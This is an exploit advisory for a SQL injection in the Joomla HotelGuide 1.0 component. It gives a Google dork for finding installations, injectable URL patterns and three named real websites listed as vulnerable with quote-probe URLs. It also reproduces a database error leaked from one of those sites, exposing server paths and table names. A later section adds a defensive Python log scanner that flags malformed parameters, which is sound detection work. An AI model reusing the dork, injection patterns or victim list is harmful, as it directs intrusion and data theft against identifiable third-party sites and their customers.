- ####################################################################
- # Exploit Title : Joomla HotelGuide Components 1.0 SQL Injection
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 30/01/2019
- # Vendor Homepage : joomla4ever.org
- # Software Download Link : joomla4ever.org/archive/ext/com_hotelguide.zip
- # Software Information Link : joomla4ever.org/extensions/ext-hotelguide
- # Software Version : 1.0
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Google Dorks : inurl:''/index.php?option=com_hotelguide''
- # Vulnerability Type : CWE-89 [ Improper Neutralization of
- Special Elements used in an SQL Command ('SQL Injection') ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- # Reference Link : cxsecurity.com/issue/WLB-2019010308
- packetstormsecurity.com/files/151425/Joomla-HotelGuide-1.0-SQL-Injection.html
- ####################################################################
- # Description about Software :
- ***************************
- " HotelGuide " is an open source component for Joomla.
- HotelGuide is a professional solution for travel agencies and tour operators.
- It supports Google Maps, with mini-images of each item grouped by region.
- Text can be translated through an internal or external interface using Joomfish.
- A set of pictures can be uploaded for each hotel.
- ####################################################################
- # Impact :
- ***********
- The HotelGuide 1.0 component for Joomla! is prone to an SQL injection vulnerability
- because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
- Exploiting this issue could allow an attacker to compromise the application,
- access or modify data, or exploit latent vulnerabilities in the underlying database.
- ####################################################################
- # SQL Injection Exploit :
- **********************
- /index.php?option=com_hotelguide&Itemid=[SQL Injection]
- /index.php?option=com_hotelguide&view=city&id=[SQL Injection]
- /index.php?option=com_hotelguide&Itemid=[ID-NUMBER]&view=city&id=[SQL Injection]
- /index.php?option=com_hotelguide&view=city&id=[ID-NUMBER]:[CITY-NAME-HERE]&Itemid=[SQL Injection]
- ####################################################################
- # Example Vulnerable Sites :
- *************************
- [+] medidatravel.com/index.php?option=com_hotelguide&Itemid=28&view=city&id=10%27
- [+] agrituristabruzzo.it/index.php?option=com_hotelguide&view=city&id=34%27
- [+] hotelbg.info/index.php?option=com_hotelguide&view=city&id=6%27
- ####################################################################
- # Example SQL Database Error :
- ****************************
- No valid database connection You have an error in your SQL syntax; check the manual
- that corresponds to your MySQL server version for the right syntax to use near ''
- at line 1 SQL=SELECT s.id AS value, s.name AS text, s.image, cc.continent AS
- continent, cc.name AS countryname, CASE WHEN CHAR_LENGTH( s.alias )
- THEN CONCAT_WS( ':', s.id, s.alias ) ELSE s.id END AS slug FROM jos_hg_states
- AS s LEFT JOIN jos_hg_countries AS cc ON cc.id =
- s.country WHERE s.published = 1 AND s.country =
- Fatal error: Uncaught exception 'RuntimeException' with message 'Unknown column
- 'header' in 'field list' SQL=SELECT `new_url`,`header`,`published` FROM
- `new2014_redirect_links` WHERE `old_url` = 'http://www.medidatravel.com
- /index.php?option=com_hotelguide&Itemid=28&view=city&id=10\'' LIMIT 0,
- 1' in /home/medidatr/public_html/libraries/joomla/database/driver/mysqli.php:610
- Stack trace: #0 /home/medidatr/public_html/libraries/joomla/database/driver.php
- (1279): JDatabaseDriverMysqli->execute() #1 /home/medidatr/public_html
- /plugins/system/redirect/redirect.php(86): JDatabaseDriver->loadObject()
- #2 [internal function]: PlgSystemRedirect::handleError(Object(Exception))
- #3 {main} thrown in /home/medidatr/public_html/libraries
- /joomla/database/driver/mysqli.php on line 610
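The error above shows the component builds its `id` value as CONCAT_WS(':', s.id, s.alias), so a legitimate `id` is either a bare integer or "integer:alias", while `Itemid` is always a bare integer. The following detection script is an added example, not part of the original advisory: it parses constructed access-log lines and flags com_hotelguide requests whose `id` or `Itemid` values break that shape (the alias character set and the log format are assumptions).

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [30/Jan/2019:10:00:01 +0000] "GET /index.php?option=com_hotelguide&view=city&id=34 HTTP/1.1" 200 5120
203.0.113.5 - - [30/Jan/2019:10:00:02 +0000] "GET /index.php?option=com_hotelguide&view=city&id=10:rome&Itemid=28 HTTP/1.1" 200 6001
198.51.100.7 - - [30/Jan/2019:10:00:03 +0000] "GET /index.php?option=com_hotelguide&Itemid=28&view=city&id=10%27 HTTP/1.1" 500 812
198.51.100.7 - - [30/Jan/2019:10:00:04 +0000] "GET /index.php?option=com_hotelguide&view=city&id=6&Itemid=28%20AND%201=1 HTTP/1.1" 500 812
192.0.2.9 - - [30/Jan/2019:10:00:05 +0000] "GET /index.php?option=com_content&view=article&id=5%27 HTTP/1.1" 200 3000
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})'
)

# Expected shapes, derived from the CONCAT_WS(':', s.id, s.alias) slug in the error.
# Assumption: a Joomla alias here only uses letters, digits, '-' and '_'.
ID_OK = re.compile(r'^\d+(?::[A-Za-z0-9_-]+)?$')
ITEMID_OK = re.compile(r'^\d+$')

def suspicious_params(uri):
    """Return [(param, decoded_value), ...] for com_hotelguide parameters that do not
    match the expected shape; an empty list for clean requests or other components."""
    # parse_qs percent-decodes values, so %27 arrives here as a literal quote.
    qs = parse_qs(urlsplit(uri).query, keep_blank_values=True)
    if qs.get('option') != ['com_hotelguide']:
        return []
    findings = []
    for name, shape in (('id', ID_OK), ('Itemid', ITEMID_OK)):
        for value in qs.get(name, []):
            if not shape.match(value):
                findings.append((name, value))
    return findings

def scan_log(text):
    """Parse each log line and report requests carrying malformed HotelGuide parameters."""
    alerts = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected log format
        hits = suspicious_params(m.group('uri'))
        if hits:
            alerts.append({'ip': m.group('ip'), 'status': int(m.group('status')),
                           'uri': m.group('uri'), 'params': hits})
    return alerts

if __name__ == '__main__':
    for alert in scan_log(SAMPLE_LOG):
        print(alert)
```

A 500 status on a flagged request, as in the sample, matches the database error shown above and is a useful second signal when tuning the rule.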
- ####################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ####################################################################